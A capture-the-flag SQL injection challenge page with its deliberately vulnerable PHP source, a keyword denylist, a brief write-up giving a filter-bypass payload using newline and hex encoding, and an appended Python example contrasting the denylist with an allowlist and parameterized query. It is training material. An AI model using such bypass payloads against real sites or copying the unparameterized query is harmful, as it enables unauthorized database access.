<html>
<head>
<title>Challenge 49</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get action=index.php>
level : <input name=lv value=1><input type=submit>
</form>
<?
if(time()<1258110000) exit();
if($_GET[lv])
{
if(eregi("union",$_GET[lv])) exit();
if(eregi("from",$_GET[lv])) exit();
if(eregi("select",$_GET[lv])) exit();
if(eregi("or",$_GET[lv])) exit();
if(eregi("and",$_GET[lv])) exit();
if(eregi("\(",$_GET[lv])) exit();
if(eregi("\)",$_GET[lv])) exit();
if(eregi("limit",$_GET[lv])) exit();
if(eregi(",",$_GET[lv])) exit();
if(eregi("/",$_GET[lv])) exit();
if(eregi("by",$_GET[lv])) exit();
if(eregi("desc",$_GET[lv])) exit();
if(eregi("asc",$_GET[lv])) exit();
if(eregi("cash",$_GET[lv])) exit();
if(eregi(" ",$_GET[lv])) exit();
if(eregi("%09",$_GET[lv])) exit();
$q=@mysql_fetch_array(mysql_query("select id from members where lv=$_GET[lv]"));
echo($q[0]);
if($q[0]=="admin") @solve();
}
?>
<!-- index.phps -->
</body>
</html>
2009-11-13 20:00:00
Filtered characters
union
from
select
or
and
(, )
limit
,
/
by
desc
asc
cash
space
%09
SELECT id from members where lv=$_GET[lv]
It is enough for id to be admin: lv=1000 || id=0x61646d696e
Spaces are replaced with %0a: lv=1000%0a||%0aid=0x61646d696e%23
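Added example (not part of the original write-up or the challenge's own code): a Python mirror of the eregi() denylist above, run against the input from this page, next to an allowlist check and a parameterized query. The function names, the handler and the `?` placeholder style are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Patterns copied from the challenge source; eregi() matches case-insensitively.
DENYLIST = ["union", "from", "select", "or", "and", r"\(", r"\)", "limit",
            ",", "/", "by", "desc", "asc", "cash", " ", "%09"]

# The input from the write-up, URL-decoded the way PHP fills $_GET.
PAGE_INPUT = unquote("1000%0a||%0aid=0x61646d696e%23")


def denylist_allows(lv):
    """Mirror of the eregi() chain: True when no pattern matches."""
    return not any(re.search(p, lv, re.IGNORECASE) for p in DENYLIST)


def parse_level(lv):
    """Allowlist check: accept 1-9 ASCII digits and nothing else.

    fullmatch() is used instead of '^...$' because '$' would also accept
    a trailing newline.
    """
    return int(lv) if re.fullmatch(r"[0-9]{1,9}", lv) else None


def build_query(level):
    """Parameterized form: SQL text and value are passed separately."""
    return "SELECT id FROM members WHERE lv = ?", (level,)


def handle(raw):
    """Hypothetical request handler: returns (sql, params) or None."""
    level = parse_level(raw)
    return None if level is None else build_query(level)


if __name__ == "__main__":
    for value in ("1", PAGE_INPUT):
        print(repr(value), "denylist passes:", denylist_allows(value),
              "| hardened handler:", handle(value))
```

The denylist lets the page's input through because none of its sixteen patterns occur in it, while the digit-only check rejects it before any SQL is built.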